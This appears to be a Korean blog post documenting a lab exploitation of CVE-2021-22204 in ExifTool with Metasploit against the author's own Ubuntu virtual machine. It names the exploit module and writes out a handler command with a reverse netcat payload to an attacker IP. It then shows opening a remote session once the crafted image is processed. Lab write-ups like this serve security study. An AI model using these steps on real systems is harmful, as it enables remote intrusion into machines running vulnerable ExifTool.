Information Security ˗ˋˏ ♡ ˎˊ˗

Security/Metasploit

[Attack] CVE-2021-22204: 메타스플로잇(Metasploit) 이용한 취약점 공격

토오쓰 2021. 11. 11. 14:15

CVE-2021-22204

목표 취약한 우분투에서 해당 취약점이 적용이 되는지 확인하기

방식 Backend

 

 

[취약점 정보]

CVE: CVE-2021-22204

Exploit: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection

Disclosure Data: 2021-05-24

Rank: excellent

 

 

[취약점 요약]

이미지 파일의 메타 데이터를 수정할 사용되는 ExifTool에서 임의 코드 실행 취약점이 발견되었다. ExifTool은 perl 스크립트로 구현되었다.

 

 

[메타스플로잇을 이용하여 CVE 정보]

0. ifconfig

공격자

공격대상

 

1. CVE 검색하기

search cve-2021-22204

 

use unix/fileformat/exiftool_djvu_ant_perl_injection

 

info

 

 

options

 

 

서버에서 클라이언트의 연결을 확인하는 listener가 없기 때문에 만들어줘야 한다.

Handler
-P: 공격자 Port
-H: 공격자 IP
-p: 페이로드 입력

 

handler -P 4444 -H 172.16.0.128 -p cmd/unix/reverse_netcat

 

 

설정 후 exploit

 

 

저장된 장소로 이동하여 공격대상 가상머신으로 옮겨준다.

 

우분투에 jpg 파일과 exiftool 압축파일을 옮기고 압축해제.

공격 대상 Ubuntu

 

공격대상

exiftool을 사용하여 이미지를 실행시킬 때, 세션이 맺어지는 것을 볼 수 있다.

공격 대상 

 

공격자

프로세스 돌아가는 것을 확인

공격자

 

sessions 확인

 

이미지 실행 후,

sessions -i ID(=1)

ifconfig 명령어를 통해서 공격대상의IP 정보를 볼 수 있다. 

공격자

 

공격 대상과 세션 맺기 성공!!